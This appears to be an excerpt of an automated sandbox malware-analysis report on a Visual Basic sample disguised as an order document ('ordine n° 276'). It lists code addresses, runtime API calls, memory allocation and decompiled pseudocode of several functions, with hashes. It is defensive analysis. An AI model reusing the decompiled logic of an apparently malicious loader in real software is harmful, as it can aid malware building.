0x00411ebc
0x00411ede
0x00411ebe
0x00411ebe
0x00411ec0
0x00411ec5
0x00411ecb
0x00411ed1
0x00411ed6
0x00411ed6
0x00411eec
0x00411f09
0x00411eee
0x00411eee
0x00411ef3
0x00411ef8
0x00411efd
0x00411efd
0x00411f23
0x00411f2d
0x00411f34
0x00411f39
0x00411f54
0x00411f5a
0x00411f5c
0x00411f69
0x00411f8e
0x00411f6b
0x00411f6b
0x00411f70
0x00411f75
0x00411f7b
0x00411f81
0x00411f86
0x00411f86
0x00411f9c
0x00411faa
0x00411fb8
0x00411fc5
0x00411fe0
0x00412000
0x0041200b
0x00412011
0x0041201e
0x00412040
0x00412020
0x00412020
0x00412025
0x0041202a
0x0041202d
0x00412033
0x00412038
0x00412038
0x0041204e
0x0041205b
0x00412062
0x00412069
0x00412070
0x00412077
0x00412078
0x0041207a
0x0041207f
0x00412082
0x00412090
0x004120ad
0x00412092
0x00412092
0x00412097
0x0041209c
0x004120a1
0x004120a1
0x004120d1
0x004120d8
0x004120dd
0x004120f8
0x004120fe
0x00412100
0x0041210d
0x00412132
0x0041210f
0x0041210f
0x00412114
0x00412119
0x0041211f
0x00412125
0x0041212a
0x0041212a
0x00412139
0x0041213b
0x0041213d
0x00412149
0x0041214a
0x0041214f
0x00412159
0x00412176
0x0041215b
0x0041215b
0x00412160
0x00412165
0x0041216a
0x0041216a
0x0041219a
0x004121a1
0x004121a6
0x004121c1
0x004121c4
0x004121c6
0x004121d3
0x004121f5
0x004121d5
0x004121d5
0x004121d7
0x004121dc
0x004121e2
0x004121e8
0x004121ed
0x004121ed
0x00412202
0x0041220e
0x00412222
0x00412229
0x0041223e
0x0041224a
0x00412256
0x00412273
0x00412278
0x00412281
0x00412286
0x00412295
0x0041229b
0x004122a8
0x004122ca
0x004122aa
0x004122aa
0x004122af
0x004122b4
0x004122b7
0x004122bd
0x004122c2
0x004122c2
0x004122d1
0x004122df
0x004122fc
0x004122e1
0x004122e1
0x004122e6
0x004122eb
0x004122f0
0x004122f0
0x00412320
0x00412327
0x0041232c
0x00412347
0x0041234d
0x0041234f
0x0041235c
0x00412381
0x0041235e
0x0041235e
0x00412363
0x00412368
0x0041236e
0x00412374
0x00412379
0x00412379
0x0041238f
0x004123ac
0x00412391
0x00412391
0x00412396
0x0041239b
0x004123a0
0x004123a0
0x004123d0
0x004123d7
0x004123dc
0x004123f7
0x004123fa
0x004123fc
0x00412409
0x0041242b
0x0041240b
0x0041240b
0x0041240d
0x00412412
0x00412418
0x0041241e
0x00412423
0x00412423
0x00412439
0x00412456
0x0041243b
0x0041243b
0x00412440
0x00412445
0x0041244a
0x0041244a
0x00412470
0x0041247a
0x00412481
0x00412486
0x004124a3
0x004124a9
0x004124ab
0x004124b8
0x004124dd
0x004124ba
0x004124ba
0x004124bf
0x004124c4
0x004124ca
0x004124d0
0x004124d5
0x004124d5
0x004124ea
0x004124f0
0x004124fa
0x00412523
0x0041253b
0x00412541
0x0041254e
0x00412570
0x00412550
0x00412550
0x00412555
0x0041255a
0x0041255d
0x00412563
0x00412568
0x00412568
0x00412577
0x0041257d
0x00412584
0x00412585
0x00412587
0x00412595
0x0041259c
0x004125a3
0x004125a4
0x004125a6
0x004125ab
0x004125ae
0x004125ae
0x004125ba
0x004125ba
0x004125c1
0x004125cb
0x004125d5
0x004125df
0x004125e9
0x004125f3
0x004125fd
0x00412607
0x00412611
0x0041261b
0x00412624

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411A35
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411A71
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA78,000000F8), ref: 00411ABE
__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 00411AE5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411B21
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DBD4,00000148), ref: 00411B6E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040D260,0000070C,?,00004435,0066936E,008374D8,0026F06A,?), ref: 00411BF3
__vbaFreeStr.MSVBVM60(?,00004435,0066936E,008374D8,0026F06A,?), ref: 00411C0D

Strings

5D, xrefs: 00411B8C
), xrefs: 004125AE

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckHresult$New2$Free
String ID: )$5D
API String ID: 4269135739-280663723
Opcode ID: f578ee74e5f61c011dce6e8ea35f8cc6d2cfc1408b1449ad1e6f9ce8f8f747bd
Instruction ID: e0804eaa7c10126f2014de847c2219301eb2009dca5e36e0f886c79f8bb1bf40
Opcode Fuzzy Hash: f578ee74e5f61c011dce6e8ea35f8cc6d2cfc1408b1449ad1e6f9ce8f8f747bd
Instruction Fuzzy Hash: B152EA75940229AFCB20EF50CD49BD9B7B5BB08304F1041EAE10ABB2A1DB759EC5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00414987, Relevance: 18.1, APIs: 12, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00414987(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v64;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr* _v92;
				intOrPtr _v108;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				void* _t48;
				char* _t49;
				void* _t51;
				char* _t54;
				intOrPtr* _t67;
				intOrPtr* _t70;
				void* _t72;
				void* _t74;
				intOrPtr _t75;

				_t75 = _t74 - 0xc;
				 *[fs:0x0] = _t75;
				_v16 = _t75 - 0x54;
				_v12 = 0x4013b0;
				_v8 = 0;
				_t39 = _a4;
				 *((intOrPtr*)( *_t39 + 4))(_t39, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t72);
				_t41 =  *0x416010; // 0x6202b8
				_v32 = 0;
				_v28 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v64 = 0;
				if(_t41 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t41 =  *0x416010; // 0x6202b8
				}
				_push( *((intOrPtr*)( *_t41 + 0x30c))(_t41));
				_t43 =  &_v48;
				_push(_t43);
				L0040154C();
				_t67 = _t43;
				_t44 =  *0x416010; // 0x6202b8
				_v92 = _t67;
				_v72 = 0x80020004;
				_v80 = 0xa;
				if(_t44 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t44 =  *0x416010; // 0x6202b8
				}
				_t46 =  &_v40;
				L0040154C();
				_t70 = _t46;
				_t48 =  *((intOrPtr*)( *_t70 + 0x190))(_t70,  &_v44, _t46,  *((intOrPtr*)( *_t44 + 0x340))(_t44));
				asm("fclex");
				if(_t48 < 0) {
					_push(0x190);
					_push(0x40daa8);
					_push(_t70);
					_push(_t48);
					L00401558();
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t49 =  &_v64;
				asm("movsd");
				_v108 =  *_t67;
				L00401522(); // executed
				L004014EC();
				L00401504();
				_t51 =  *((intOrPtr*)(_v108 + 0x1ec))(_v92, _t49, _t49, _t49, _v44, 0, 0);
				asm("fclex");
				if(_t51 < 0) {
					_push(0x1ec);
					_push(0x40dc14);
					_push(_v92);
					_push(_t51);
					L00401558();
				}
				L00401528();
				_push( &_v48);
				_push( &_v44);
				_t54 =  &_v40;
				_push(_t54);
				_push(3);
				L00401546();
				L00401516();
				_v32 = 0x389c1670;
				_v28 = 0x5af9;
				_push(E00414B27);
				return _t54;
			}

0x0041498a
0x00414999
0x004149a6
0x004149a9
0x004149b2
0x004149b5
0x004149bb
0x004149be
0x004149c5
0x004149c8
0x004149cb
0x004149ce
0x004149d1
0x004149d4
0x004149d7
0x004149da
0x004149dc
0x004149e1
0x004149e6
0x004149eb
0x004149eb
0x004149f9
0x004149fa
0x004149fd
0x004149fe
0x00414a03
0x00414a05
0x00414a0c
0x00414a0f
0x00414a16
0x00414a1d
0x00414a1f
0x00414a24
0x00414a29
0x00414a2e
0x00414a2e
0x00414a3d
0x00414a41
0x00414a49
0x00414a4f
0x00414a55
0x00414a59
0x00414a5b
0x00414a60
0x00414a65
0x00414a66
0x00414a67
0x00414a67
0x00414a76
0x00414a77
0x00414a7d
0x00414a7e
0x00414a82
0x00414a83
0x00414a86
0x00414a8f
0x00414a99
0x00414aa5
0x00414aab
0x00414aaf
0x00414ab1
0x00414ab6
0x00414abb
0x00414abe
0x00414abf
0x00414abf
0x00414ac7
0x00414acf
0x00414ad3
0x00414ad4
0x00414ad7
0x00414ad8
0x00414ada
0x00414ae5
0x00414aea
0x00414af1
0x00414af8
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004149E6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004149FE
__vbaNew2.MSVBVM60(0040DE54,00416010,?,00000000), ref: 00414A29
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414A41
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DAA8,00000190), ref: 00414A67
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414A86
__vbaStrVarMove.MSVBVM60(00000000), ref: 00414A8F
__vbaStrMove.MSVBVM60(00000000), ref: 00414A99
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DC14,000001EC), ref: 00414ABF
__vbaFreeStr.MSVBVM60 ref: 00414AC7
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00414ADA
__vbaFreeVar.MSVBVM60 ref: 00414AE5

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMoveNew2$CallLateList
String ID:
API String ID: 3081447974-0
Opcode ID: f4332d8e0ab93a4531de8d70540e45a52df5129872e44f7a009223ed55894db3
Instruction ID: ccde0520d1b79f1b6add1dccc3f26d05d9b69b646b608a477e6d899c2c28c292
Opcode Fuzzy Hash: f4332d8e0ab93a4531de8d70540e45a52df5129872e44f7a009223ed55894db3
Instruction Fuzzy Hash: 2741ECB1D00204ABCB01EFD9C885ADEBBB8BF48304F50442AF516BB291DB7999458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040157C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401581

Strings

VB5!6&*, xrefs: 0040157C

Memory Dump Source

Source File: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: e345a690007a34138f96a7ce14a60ae483a67cf9896732e1ca45a97719e44a23
Instruction ID: 5663ca34d4e9a77a529cff9aed93ea72537c89c5caf4b87509c06c17e468bb16
Opcode Fuzzy Hash: e345a690007a34138f96a7ce14a60ae483a67cf9896732e1ca45a97719e44a23
Instruction Fuzzy Hash: 23D04E0094E3C01EE70323724D211042FB49C93A5030F06EB91C2CE0F3C08C4889C77B

Uniqueness

Uniqueness Score: -1.00%

Function 00404C02, Relevance: 1.7, APIs: 1, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89234d04b631d0bcbc04722f219f4c082423e40d69000eeefb0f7f59c4bb2eb0
Instruction ID: 3b9a9504f9f16e843b0417f4907195c5775bac2623f6d1492e37d6976387c8c9
Opcode Fuzzy Hash: 89234d04b631d0bcbc04722f219f4c082423e40d69000eeefb0f7f59c4bb2eb0
Instruction Fuzzy Hash: 9E714722B1AB000B8759D4BE88D0AA7D1C39FDE250739E639212DE73A9FD79CD4B0548

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1C, Relevance: 1.7, APIs: 1, Instructions: 430COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 269d88b92d31d7c64cff7cacf4d3aa9d15d6b0bb69987b915ea1243f87643037
Instruction ID: 00a45efc0d6110a11f7414d43acb4d9f5365361cdbf996614e9a76da2357be46
Opcode Fuzzy Hash: 269d88b92d31d7c64cff7cacf4d3aa9d15d6b0bb69987b915ea1243f87643037
Instruction Fuzzy Hash: 8F813962B1AB000B8759D4BE89D0AA7D1D39FDE250739E63D212DF33A9FD79CC4A1148

Uniqueness

Uniqueness Score: -1.00%

Function 00404CF5, Relevance: 1.6, APIs: 1, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96f7e8c15b614d6644386cc4ffa30760f0bb894d7e5f3615cf0a2c56bf0c7ca9
Instruction ID: 30de3a81ea9bf2f7c0583e9b155e4401e809e1b6c0d05764b74a238707aa39ac
Opcode Fuzzy Hash: 96f7e8c15b614d6644386cc4ffa30760f0bb894d7e5f3615cf0a2c56bf0c7ca9
Instruction Fuzzy Hash: 2A612762B1AB000B8759D4BE89D0A6791C3DFDE250739E639212DF33A9FD79CC4B0548

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD6, Relevance: 1.6, APIs: 1, Instructions: 301memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d5b5b80994544afeb8bc4aa872674f077da3adf3269154e8d59290fd7d392f0
Instruction ID: 0730abc9d1724f8340d6eff9463c5d3afff30bd771ef98be0caf2a12b8ad1fa8
Opcode Fuzzy Hash: 1d5b5b80994544afeb8bc4aa872674f077da3adf3269154e8d59290fd7d392f0
Instruction Fuzzy Hash: 27419C22B1AB004B8799D47E88D0A66D1C3DFDE250739E63D212DF33A9FD79CC4A0648

Uniqueness

Uniqueness Score: -1.00%

Function 00404EE6, Relevance: 1.5, APIs: 1, Instructions: 278memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cd11b77944458edd8cb50921c36496eb7c8fc6171ace961bcbcb0cc10f73f52a
Instruction ID: 40d140d61c1a91f208ad801570af81a6a8f36a5993d6d350075b070321140268
Opcode Fuzzy Hash: cd11b77944458edd8cb50921c36496eb7c8fc6171ace961bcbcb0cc10f73f52a
Instruction Fuzzy Hash: BE516526F19B040B875AD8BE889069791D39FDE250739E639202DE3369FD79CC4B0688

Uniqueness

Uniqueness Score: -1.00%

Function 00404DF2, Relevance: 1.5, APIs: 1, Instructions: 275memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3e97dc4dedb58a5ae15a82f778aabc84891f086691f87323e07e13a0d5360f1e
Instruction ID: d0a76fcca5b50f1329e17c57fc654c5d253edf6a160e0dfc7982a7070154e307
Opcode Fuzzy Hash: 3e97dc4dedb58a5ae15a82f778aabc84891f086691f87323e07e13a0d5360f1e
Instruction Fuzzy Hash: 9E514A22F1AB000B8759D47E8890A5791D3DFDE260739E639602DF33A9FD79CC4B1548

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02173174, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.749413362.0000000002170000.00000040.00000001.sdmp, Offset: 02170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2170000_ordine n#U00b0 276.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: effd1a34f79a8f82a86a8eebd3fbc32f8f6d3e808ed018edbbcd1f1d03c5bba5
Instruction ID: 8d753b640bab6776e5ab118862431f7b44da60e73d341fa9d0c7e9465d3816a6
Opcode Fuzzy Hash: effd1a34f79a8f82a86a8eebd3fbc32f8f6d3e808ed018edbbcd1f1d03c5bba5
Instruction Fuzzy Hash: 63C04C72A0829487EB938A94A4E5AC17BB09F87254B6847C5C5841D05AEA2A0A568AC2

Uniqueness

Uniqueness Score: -1.00%

Function 004143A6, Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E004143A6(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				intOrPtr _v52;
				char _v60;
				signed int _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t43;
				intOrPtr* _t75;
				intOrPtr* _t76;
				intOrPtr* _t77;
				signed int _t80;
				intOrPtr _t83;
				intOrPtr _t86;

				_push(0x4013f6);
				_t38 =  *[fs:0x0];
				_push(_t38);
				 *[fs:0x0] = _t80;
				_v12 = _t80 - 0x54;
				_v8 = 0x401368;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				L004014AA();
				L004014AA();
				L0040149E();
				L00401504();
				_push(_t38);
				_push(L"DICE");
				L004014A4();
				asm("sbb esi, esi");
				L00401528();
				if( ~( ~_t38 + 1) != 0) {
					_push( &_v60);
					_v52 = 0x80020004;
					_v60 = 0xa;
					L00401498();
					L00401516();
					_t83 =  *0x416364; // 0x21ae8d4
					if(_t83 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t75 =  *0x416364; // 0x21ae8d4
					_t41 =  *((intOrPtr*)( *_t75 + 0x14))(_t75,  &_v44);
					asm("fclex");
					if(_t41 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t75);
						_push(_t41);
						L00401558();
					}
					_t42 = _v44;
					_t76 = _t42;
					_t43 =  *((intOrPtr*)( *_t42 + 0xf0))(_t42,  &_v40);
					asm("fclex");
					if(_t43 < 0) {
						_push(0xf0);
						_push(0x40da40);
						_push(_t76);
						_push(_t43);
						L00401558();
					}
					_v40 = 0;
					L00401504();
					L00401552();
					_t86 =  *0x416364; // 0x21ae8d4
					if(_t86 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t77 =  *0x416364; // 0x21ae8d4
					_t38 =  *((intOrPtr*)( *_t77 + 0x48))(_t77, 0x80,  &_v40);
					asm("fclex");
					if(_t38 < 0) {
						_push(0x48);
						_push(0x40da20);
						_push(_t77);
						_push(_t38);
						L00401558();
					}
					_v40 = 0;
					L00401504();
				}
				_push(E00414557);
				L00401528();
				L00401528();
				L00401528();
				L00401528();
				return _t38;
			}

0x004143ab
0x004143b0
0x004143b6
0x004143b7
0x004143c4
0x004143c7
0x004143d6
0x004143d9
0x004143dc
0x004143df
0x004143e2
0x004143e5
0x004143e8
0x004143eb
0x004143f6
0x004143fb
0x00414405
0x0041440a
0x0041440b
0x00414410
0x00414419
0x00414421
0x00414429
0x00414432
0x00414433
0x0041443a
0x00414441
0x00414449
0x0041444e
0x00414454
0x00414456
0x0041445b
0x00414460
0x00414460
0x00414465
0x00414472
0x00414475
0x00414479
0x0041447b
0x0041447d
0x00414482
0x00414483
0x00414484
0x00414484
0x00414489
0x00414493
0x00414495
0x0041449b
0x0041449f
0x004144a1
0x004144a6
0x004144ab
0x004144ac
0x004144ad
0x004144ad
0x004144b8
0x004144bb
0x004144c3
0x004144c8
0x004144ce
0x004144d0
0x004144d5
0x004144da
0x004144da
0x004144df
0x004144f1
0x004144f4
0x004144f8
0x004144fa
0x004144fc
0x00414501
0x00414502
0x00414503
0x00414503
0x0041450e
0x00414511
0x00414511
0x00414516
0x00414539
0x00414541
0x00414549
0x00414551
0x00414556

APIs

__vbaStrCopy.MSVBVM60 ref: 004143EB
__vbaStrCopy.MSVBVM60 ref: 004143F6
#669.MSVBVM60 ref: 004143FB
__vbaStrMove.MSVBVM60 ref: 00414405
__vbaStrCmp.MSVBVM60(DICE,00000000), ref: 00414410
__vbaFreeStr.MSVBVM60(DICE,00000000), ref: 00414421
#594.MSVBVM60(?,DICE,00000000), ref: 00414441
__vbaFreeVar.MSVBVM60(?,DICE,00000000), ref: 00414449
__vbaNew2.MSVBVM60(0040DA30,00416364,?,DICE,00000000), ref: 00414460
__vbaHresultCheckObj.MSVBVM60(00000000,021AE8D4,0040DA20,00000014), ref: 00414484
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 004144AD
__vbaStrMove.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 004144BB
__vbaFreeObj.MSVBVM60(00000000,?,0040DA40,000000F0), ref: 004144C3
__vbaNew2.MSVBVM60(0040DA30,00416364), ref: 004144DA
__vbaHresultCheckObj.MSVBVM60(00000000,021AE8D4,0040DA20,00000048), ref: 00414503
__vbaStrMove.MSVBVM60(00000000,021AE8D4,0040DA20,00000048), ref: 00414511
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414539
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414541
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414549
__vbaFreeStr.MSVBVM60(00414557,DICE,00000000), ref: 00414551

Strings

DICE, xrefs: 0041440B

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMove$CopyNew2$#594#669
String ID: DICE
API String ID: 3067780711-2543521760
Opcode ID: 3c97a2a022ad3300607320decd5a5cf7e9f3f41c9828c5d9d3ccb88febd51c45
Instruction ID: d23d128d7b24eae07e39dcb3c7f0d2caced7c04bc43e14603b701ac5ece39557
Opcode Fuzzy Hash: 3c97a2a022ad3300607320decd5a5cf7e9f3f41c9828c5d9d3ccb88febd51c45
Instruction Fuzzy Hash: 77416C70D40209ABCB10EF96CC46AEEB7B4EF94714F20402EF512771A1DB786A45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00414C40, Relevance: 25.6, APIs: 17, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00414C40(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr* _t39;
				char* _t40;
				void* _t42;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t46;
				intOrPtr* _t48;
				void* _t50;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t75;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t81;

				_t78 = _t77 - 0xc;
				 *[fs:0x0] = _t78;
				_v16 = _t78 - 0x54;
				_v12 = 0x4013d0;
				_v8 = 0;
				_t39 = _a4;
				_t40 =  *((intOrPtr*)( *_t39 + 4))(_t39, __edi, __esi, __ebx,  *[fs:0x0], 0x4013f6, _t75);
				_push(0x40dccc);
				_v28 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v60 = 0;
				L00401492();
				if(_t40 != 1) {
					_t81 =  *0x416364; // 0x21ae8d4
					if(_t81 == 0) {
						_push(0x416364);
						_push(0x40da30);
						L0040155E();
					}
					_t72 =  *0x416364; // 0x21ae8d4
					_t42 =  *((intOrPtr*)( *_t72 + 0x14))(_t72,  &_v44);
					asm("fclex");
					if(_t42 < 0) {
						_push(0x14);
						_push(0x40da20);
						_push(_t72);
						_push(_t42);
						L00401558();
					}
					_t43 = _v44;
					_t73 = _t43;
